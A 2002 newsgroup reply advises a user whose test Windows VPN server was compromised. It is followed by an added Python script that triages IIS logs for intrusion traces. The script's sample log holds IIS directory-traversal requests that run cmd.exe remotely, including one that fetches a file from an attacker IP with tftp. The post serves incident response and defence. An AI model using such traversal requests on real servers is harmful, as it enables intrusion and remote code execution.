Re: VPN server
From: karl [x y] (jamescagney90210@excite.com)
Date: 07/29/02
- Next message: michael jon: "printers and Scheduled Tasks Wizard seen in network neighborhood"
- Previous message: Nia: "Error in accessing servers with different dates"
- In reply to: Snigdha: "VPN server"
- Next in thread: Snigdha: "Re: VPN server"
- Reply: Snigdha: "Re: VPN server"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "karl [x y]" <jamescagney90210@excite.com> Date: Mon, 29 Jul 2002 08:57:35 -0400
"Snigdha" <snigdha20@yahoo.com> wrote in message
news:e3tmGrvNCHA.2340@tkmsftngp12...
> I am just testing installing a test VPN server in win2k machine. I left
> the server running this weekend. The server got hacked. My ISP has taken my
> machine off the network. When I logon to the machine I found out it is
> running cmd.exe, sfind.exe, 1.tmp, irc.exe in my task manager list. Is
> there any info on there on this processes?
Yes, nowadays you really should not be putting unsecured systems onto the
internet, even "just a test machine," as it could be a stepping stone for a
hacker to get past your firewall and onto your regular network. Other
machines on your network could be compromised.
It's hard to tell what a file does and what a hacker did with it from a file
name. Running a trojan detector such as www.gfi.com or www.pestpatrol.com
might tell you about some of those files. If this machine was infected with
a worm, installing and running an antivirus program might help as well.
Installing Sygate firewall and running fprot from foundstone.com might also
let you see what ports are being used to communicate, which is a clue. I
would also check your IIS web and FTP server and firewall/router logs,
assuming logging is enabled. [check for any line containing .EXE or % and
that also contains a 200 or 502 result code]. Doing this could tell you
exactly what commands were used to take control of the machine.
If one of those files is a renamed nc.exe aka netcat, that file has a lot of
different purposes. cmd.exe might or might not be a dos prompt/command
shell that could allow the hacker to remotely execute commands on your
system, possibly using URLs sent to IIS web services that cause buffer
overflows. irc.exe might or might not be a file that makes your system
connect as a zombie to an IRC newsgroup and advertise its presence, waiting
for a hacker to take control of it through the IRC channel. 1.tmp might or
might not be a sniffer program collecting passwords or the sniffer log file
itself, netcat, an ftp program, etc. sfind.exe might or might not be a
program [possibly from foundstone.com] that manipulates files that are
hidden from you by using file streams [e.g. a file is named
boot.ini|hackertool.exe so that without a special tool, all you see is the
boot.ini file... in other words, there might be other hacker files on your
system]. Using sfind from foundstone.com or streams.exe from
sysinternals.com might help you find these files.
http://lists.jammed.com/forensics/2001/12/0010.html
The only way to completely be sure this system is clean is to format and
reinstall windows. This is because you might miss a hidden login ID or a
back door that would let the hacker back in. However, before you do this,
you probably want to determine how the intrusion took place, as this will
help you guard against the same thing happening next time, and might help
you determine whether other machines have been compromised.
To secure your system, install all microsoft update patches, IISlockdown
including URLscan, and perform the securing windows / IIS checklists which
are all found at www.microsoft.com/security BEFORE making the server visible
from the internet. An antivirus program that downloads updates daily, firewall
hardware and software [such as sygate which is free for non-commercial use
and Netgear which starts at just $70 US], a file change monitor like
Languard file integrity checker from www.gfi.com are all good ideas.
The book Incident Response is a good introduction to how to deal with and
recognize incidents like this, and Hacking Exposed 3rd edition is a good
overview of how to secure your system and how systems are compromised.
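The log check karl suggests (lines containing .EXE or % together with a 200 or 502 result code) is easy to script against an IIS W3C extended log. The following is an added example, not part of karl's reply or of any Microsoft or Foundstone tool; it is written in Python rather than the 2002-era utilities named above, and the log lines it scans are a constructed sample in the style of the cmd.exe-via-URL requests the post describes, not a real capture. It also decodes the %-encoding (twice, because the sample uses double-encoded path separators such as %255c) so the command the attacker ran can be read directly, and separately counts every cmd.exe or encoded request per client regardless of status, since a 404 from the same host is a failed attempt that still tells you who was probing.

```python
import urllib.parse
from collections import Counter

# Constructed sample of an IIS 5 W3C extended log (not a real capture).
# The successful (200) and gateway-error (502) lines from 10.0.0.9 are the
# ones the post's heuristic is meant to catch; the 404 line is a failed probe.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-07-27 03:12:44
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-07-27 03:12:44 10.0.0.5 GET /default.htm - 200
2002-07-27 03:15:02 10.0.0.9 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir+c:\\ 200
2002-07-27 03:15:10 10.0.0.9 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+tftp+-i+10.0.0.9+GET+1.tmp 502
2002-07-27 03:16:30 10.0.0.5 GET /images/logo.gif - 304
2002-07-27 03:17:00 10.0.0.9 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404
"""


def parse_w3c(text):
    """Yield one dict per request line, naming columns from the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line.split()[1:]
            continue
        if fields is None:
            raise ValueError("request line before #Fields: header")
        values = line.split()
        if len(values) != len(fields):
            continue  # skip a malformed line rather than abort the triage
        yield dict(zip(fields, values))


def full_uri(entry):
    """Rejoin stem and query; W3C logs write '-' for an empty query."""
    uri = entry["cs-uri-stem"]
    if entry.get("cs-uri-query", "-") != "-":
        uri += "?" + entry["cs-uri-query"]
    return uri


def decode_uri(uri):
    """Undo %-encoding twice (the sample double-encodes, e.g. %255c -> %5c -> \\)
    and turn '+' into spaces so the command line reads as typed."""
    twice = urllib.parse.unquote(urllib.parse.unquote(uri))
    return twice.replace("+", " ")


def matches_heuristic(entry):
    """The post's rule: .EXE or % in the request, and a 200 or 502 result code."""
    uri = full_uri(entry)
    return (".exe" in uri.lower() or "%" in uri) and entry["sc-status"] in ("200", "502")


def triage(text):
    """Return the lines that match the heuristic, with the request decoded."""
    hits = []
    for entry in parse_w3c(text):
        if matches_heuristic(entry):
            hits.append({
                "time": f'{entry["date"]} {entry["time"]}',
                "ip": entry["c-ip"],
                "status": int(entry["sc-status"]),
                "request": decode_uri(full_uri(entry)),
            })
    return hits


def probing_hosts(text):
    """Count every .exe/%-encoded request per client, whatever the status,
    so failed attempts (404) still identify the source address."""
    counts = Counter()
    for entry in parse_w3c(text):
        uri = full_uri(entry)
        if ".exe" in uri.lower() or "%" in uri:
            counts[entry["c-ip"]] += 1
    return counts


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} {hit["status"]} {hit["request"]}')
    print("requests per probing host:", dict(probing_hosts(SAMPLE_LOG)))
```

Point `triage` at the contents of a real ex*.log from %SystemRoot%\system32\LogFiles\W3SVC1 (the default IIS 5 location) and the decoded `request` field shows what was executed; in the sample, the 502 line is the attacker pulling 1.tmp onto the box with tftp, which matches the unexplained file in the original poster's task list.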